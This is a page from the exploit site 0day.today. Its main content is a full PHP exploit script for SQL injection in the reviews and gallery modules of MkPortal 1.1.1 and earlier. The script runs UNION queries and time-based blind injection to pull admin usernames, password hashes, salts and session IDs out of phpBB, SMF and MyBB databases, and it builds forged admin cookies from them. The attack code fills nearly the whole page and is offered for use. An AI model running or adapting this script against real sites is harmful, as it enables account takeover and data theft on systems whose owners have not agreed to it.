0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MkPortal <= 1.1.1 reviews / gallery modules SQL Injection Exploit
[=================================================================
MkPortal <= 1.1.1 reviews / gallery modules SQL Injection Exploit
=================================================================
<?php
/*
[i] MkPortal "reviews" and "gallery" modules SQL Injection Exploit
[i] Vulnerable versions: MkPortal <= 1.1.1
[i] Bug discovered by: Coloss
[i] Exploit by: Coloss
[i] Date: 06.07.2007
[i] This is priv8 not for kids
[Notes]
At this time MkPortal 1.1.1 is the latest stable release
Currently implemented: phpbb, smf and mybb
*/
$exptime = 3600;
$stcnt = 300000;
$maxnull = 5;
$opts = getopt("u:U:P:f:m:d:o:");
$vars = array ( "phpbb", "1 UNION SELECT %s FROM phpbb_users WHERE user_id=2",
"phpbb_sid", "1 UNION SELECT %s FROM phpbb_sessions WHERE session_user_id=2 ORDER BY descrizione DESC LIMIT 1",
"smf", "1 UNION SELECT %s FROM smf_members WHERE ID_MEMBER=1",
"mybb", "1 UNION SELECT %s FROM mybb_users WHERE uid=1",
);
print
"[i] MkPortal \"reviews\" and \"gallery\" modules SQL Injection Exploit
[i] Vulnerable versions: MkPortal <= 1.1.1
[i] Bug discovered by: Coloss
[i] Exploit by: Coloss
[i] Date: 06.07.2007
[i] This is priv8 not for kids\n\n";
if ($opts[u] == '')
die(help($argv[0]));
if (!strncmp($opts[u], "http", 4))
$url = $opts[u];
else
$url = "http://".$opts[u];
if ($opts[U])
$user = $opts[U];
if ($opts[P])
$pass = $opts[P];
if ($opts[f])
$forum = $opts[f];
if ($opts[m])
$met = $opts[m];
if ($opts[o])
$file = $opts[o];
if ($opts[d])
$dir = $opts[d];
$cookies = '';
$delay = $min = $max = $mid = 0;
$fld1 = $fld2 = '';
if (!$forum)
die("[X] You haven't specified any forum type!\n");
echo "[+] Target: $url [$forum]\n\n";
exploit();
function exploit_gallery ($f)
{
global $cookies, $url, $fld1, $fld2;
$sql = get_sql($f);
$str = "NULL,".$fld1.",".$fld2.",NULL,NULL";
$req = sprintf($sql, $str);
$u = $url."index.php?ind=gallery&op=edit_file&iden=".urlencode($req);
$html = Send($u, NULL, $cookies);
if (strstr($html, "ERROR: Database error"))
die("[X] SQL Query Error.. probably wrong table prefix\n");
else if (strstr($html, "<title>Error</title>"))
die("[X] This method failed. Try something else\n");
$var1 = get_string($html,"name=\"titolo\" value=\"","\"");
$var2 = get_string($html,"name=\"descrizione\" class=\"bgselect\">","<");
return ($var1." ".$var2);
}
function get_delay ($cnt, $f, $u)
{
global $url, $cookies, $fld1, $fld2, $met;
$sql = get_sql($f);
if (strstr($met, "gallery"))
$str = "NULL,".$fld1.",".$fld2.",NULL,NULL";
else
$str = $fld1;
$inj = sprintf($sql, $str);
if (strstr($inj, "ORDER BY")) {
list($base, $order) = explode("ORDER BY", $inj);
$inj = $base."AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,1,BENCHMARK(%d,MD5(31337))) ORDER BY". $order;
}
else
$inj .= " AND IF(ORD(SUBSTR(%s,%d,1))%s,1,BENCHMARK(%d,MD5(31337)))";
$req = sprintf($inj, $fld1, 1, "=1", $cnt);
$u .= urlencode($req);
$start = getmicrotime();
Send($u, NULL, $cookies);
$end = getmicrotime();
$delay = intval(10 * ($end - $start));
return $delay;
}
function get_normaldelay ($f, $u)
{
global $stcnt;
$na = get_delay(1,$f,$u);
$da = get_delay($stcnt,$f,$u);
$nb = get_delay(1,$f,$u);
$db = get_delay($stcnt,$f,$u);
$nc = get_delay(1,$f,$u);
$dc = get_delay($stcnt,$f,$u);
$mean_delayed = intval(($da + $db + $dc) / 3);
if ($mean_delayed < 2)
die("Failed. The Answer was too rapid, probably you have not enough privileges\n");
return $mean_delayed;
}
function exploit_blind ($sql, $u, $field)
{
global $cookies, $stcnt, $delay, $min, $max, $mid;
$cnt = $stcnt * 4;
echo "[->] Trying to find value for '".$field."'\n";
for ($i = 1; $i < 51; $i++) {
for ($j = $min; $j <= $max; $j++) {
if ($j == $mid)
$j = 97;
$req = sprintf($sql, $field, $i, "=$j", $cnt);
$ur = $u.urlencode($req);
$start = getmicrotime();
Send($ur, NULL, $cookies);
$end = getmicrotime();
$dtime = intval(10 * ($end - $start));
if ($dtime > ($delay * 2)) {
$out .= chr($j);
echo "[+] Current value for '".$field."' (".$i."): ".$out."\n";
break;
}
if ($j == $max)
$i = 41;
}
}
if ($out)
echo "\n[->] Found value for '".$field."': ".$out."\n\n";
return $out;
}
function exploit_gallery_blind ($f)
{
global $fld1, $fld2, $url;
$str = "NULL,".$fld1.",".$fld2.",NULL,NULL";
$sql = get_sql($f);
$inj = sprintf($sql, $str);
$u = $url."index.php?ind=gallery&op=edit_file&iden=";
$var1 = exploit_init_blind($f, $u, $inj, $fld1);
$var2 = exploit_init_blind($f, $u, $inj, $fld2);
return ($var1." ".$var2);
}
function exploit_reviews ($f)
{
global $fld1, $fld2, $url;
$u = $url."index.php?ind=reviews&op=update_file&iden=";
$sql = get_sql($f);
$inj = sprintf($sql, $fld1);
$var1 = exploit_init_blind($f, $u, $inj, $fld1);
$inj = sprintf($sql, $fld2);
$var2 = exploit_init_blind($f, $u, $inj, $fld2);
return ($var1." ".$var2);
}
function exploit_init_blind ($f, $u, $inj, $field)
{
global $cookies, $delay, $fld1, $fld2, $mid;
if (strstr($inj, "ORDER BY")) {
list($base, $order) = explode("ORDER BY", $inj);
if ($mid == 58)
$inj = $base."AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY". $order;
else
$inj = $base."AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY". $order;
}
else {
if ($mid == 58)
$inj .= " AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1)";
else
$inj .= " AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1)";
}
echo "[->] Starting blind sql injection!\n";
echo "[+] Getting standard response delay... ";
$delay = get_normaldelay($f,$u);
echo $delay."ds\n\n";
$var = exploit_blind($inj, $u, $field);
if (strstr($f, "sid") && !$var)
die("[X] Probably there are more sid in the table.. so we cannot fetch it.. retry later.\n");
return $var;
}
function get_data ($f)
{
global $met;
switch ($met) {
case 'reviews':
$res = exploit_reviews($f); break;
case 'gallery-blind':
$res = exploit_gallery_blind($f); break;
case 'gallery':
$res = exploit_gallery($f); break;
default:
die("[X] Invalid exploit method specified\n");
}
return $res;
}
function phpbb_exploit ()
{
global $dir, $url, $user, $pass, $cookies, $forum, $exptime, $fld1, $fld2, $min, $max, $mid;
if ($user && $pass) {
echo "[+] Logging in... ";
$u = $url.$dir."login.php?login=true";
$post = "username=".$user."&password=".$pass."&redirec=portalhome&submit=Login";
$html = Send($u, $post, NULL, TRUE);
$lines = explode("\n", $html);
foreach($lines as $line) {
if (strstr($line, "Set-Cookie") && strstr($line, "sid")) {
$cookies = get_string($line, "Set-Cookie: ", ";");
$c++;
}
}
if (!$cookies || $c < 2)
die("Failed\n");
echo "Successfull\n\n";
}
$fld1 = "username"; $fld2 = "user_password";
$min = 48; $max = 122; $mid = 58;
$res = get_data($forum);
list($auesr, $apwd) = explode(" ", $res);
if ($auser && strlen($apwd) == 32) {
owrite("\n[+] Target: $url [$forum]\n");
owrite("[->] Found admin username: '".$auser."'\n");
owrite("[->] Found admin hash password: '".$apwd."'\n");
}
else
die("[X] Failed to retrive informations\n");
$fld1 = "session_id"; $fld2 = "session_time";
$max = 102;
$res = get_data($forum."_sid");
list($sid,$start) = explode(" ", $res);
if ($sid && strlen($sid) == 32) {
$t = (int) (time() - $start - $exptime);
if ($t >= 0)
echo "[!] Found admin sid ('".$sid."') but it should not be valid anymore\n";
else
owrite("[->] Found admin sid: '".$sid."' valid for ~".abs($t)."s\n");
}
else
echo "[!] No admin sid was found\n";
}
function smf_exploit ()
{
global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max;
$base = 'a:4:{i:0;s:1:"1";i:1;s:40:"%s";i:2;i:1184000000;i:3;i:0;}';
if ($user && $pass) {
echo "[+] Logging in... ";
$u = $url.$dir."index.php?action=login2";
$post = "user=".$user."&passwrd=".$pass."&cookieneverexp=on&submit=Login";
$html = Send($u, $post, NULL, TRUE);
$lines = explode("\n", $html);
foreach($lines as $line) {
if (strstr($line, "Set-Cookie") && !strstr($line, "PHPSESSID"))
$cookies = get_string($line, "Set-Cookie: ", ";");
}
if (!$cookies)
die("Failed\n");
echo "Successfull\n\n";
}
$fld1 = "passwd"; $fld2 = "passwordSalt";
$min = 48; $max = 102; $mid = 58;
$res = get_data($forum);
list($pwd,$salt) = explode(" ", $res);
if ($pwd && strlen($pwd) == 40 && strlen($salt) == 4) {
$pass = $pwd.$salt;
$pass = sha1($pass);
$cookie = sprintf($base, $pass);
list($cname) = explode("=", $cookies);
owrite("\n[+] Target: $url [$forum]\n");
owrite("[+] Found admin cookie '".$cname."': '".urlencode($cookie)."'\n");
}
else
die("[X] Failed to retrive informations\n");
}
function mybb_exploit ()
{
global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max, $mid;
if ($user && $pass) {
echo "[+] Logging in... ";
$u = $url.$dir."member.php";
$post = "username=".$user."&password=".$pass."&action=do_login&submit=Login";
$html = Send($u, $post, NULL, TRUE);
$lines = explode("\n", $html);
foreach($lines as $line) {
if (strstr($line, "Set-Cookie") && !strstr($line, "PHPSESSID") && !strstr($line, "[last") && !strstr($line,
" sid=")) {
$cookies = get_string($line, "Set-Cookie: ", ";");
}
}
if (!$cookies)
die("Failed\n");
echo "Successfull\n\n";
}
$fld1 = "loginkey"; $fld2 = "username";
$min = 48; $max = 122; $mid = 91;
$res = get_data($forum);
list($key,$auser) = explode(" ", $res);
if ($key && strlen($key) == 50) {
$cookie = sprintf($base, $pass);
list($cname) = explode("=", $cookies);
owrite("\n[+] Target: $url [$forum]\n");
owrite("[+] Found admin cookie '".$cname."': '1_".$key."'\n");
}
else
die("[X] Failed to retrive informations\n");
$fld1 = "password"; $fld2 = "salt";
$res = get_data($forum);
list($apwd,$salt) = explode(" ", $res);
if ($apwd && strlen($apwd) == 32 && $salt && strlen($salt) == 8) {
owrite("[+] Found admin hash password: '".$apwd."'\n");
owrite("[+] Found admin password salt: '".$salt."'\n");
}
else
echo "[!] No admin sid was found\n";
}
function exploit ()
{
global $forum;
switch ($forum) {
case 'phpbb':
phpbb_exploit(); break;
case 'smf':
smf_exploit(); break;
case 'mybb':
mybb_exploit(); break;
default:
die("Failed. Cannot handle this type of forum\n");
}
}
function get_string ($str, $start, $end)
{
$res = substr($str, strpos($str, $start)+strlen($start),strpos(substr($str, strpos($str,
$start)+strlen($start),strlen($str)), $end));
return $res;
}
function get_sql ($var)
{
global $vars;
for ($i = 0, $j = 1; $vars[$i]; $i++, $j++) {
if ($vars[$i] == $var)
return $vars[$j];
}
}
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
function Send($url, $post_fields='', $cookie = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
if ($post_fields) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
}
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
if(!empty($cookie))
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
if($headers === TRUE)
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
else
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
$fc = curl_exec($ch);
curl_close($ch);
return $fc;
}
function owrite ($msg)
{
global $file, $debug;
echo $msg;
if ($file) {
if (!($h = fopen($file, 'ab')) && $debug) {
echo "[X] Cannot open '$file'\n";
return;
}
if (fwrite($h, $msg) === FALSE && $debug)
echo "[X] Cannot write to '$file'\n";
fclose($h);
}
}
function help ($prog)
{
print "[-] Usage: $prog
-u <url> -> Sets Target url
[-U] <user> -> Your username
[-P] <hash> -> Your password
[-f] <type> -> Sets Forum type (phpbb, smf or mybb)
[-m] <method> -> Which method do you want to use (gallery or reviews)
[-d] <dir> -> Sets forum subdirectory
[-o] <file> -> Writes results to a file\n";
}
?>
# 0day.today [2024-11-16] #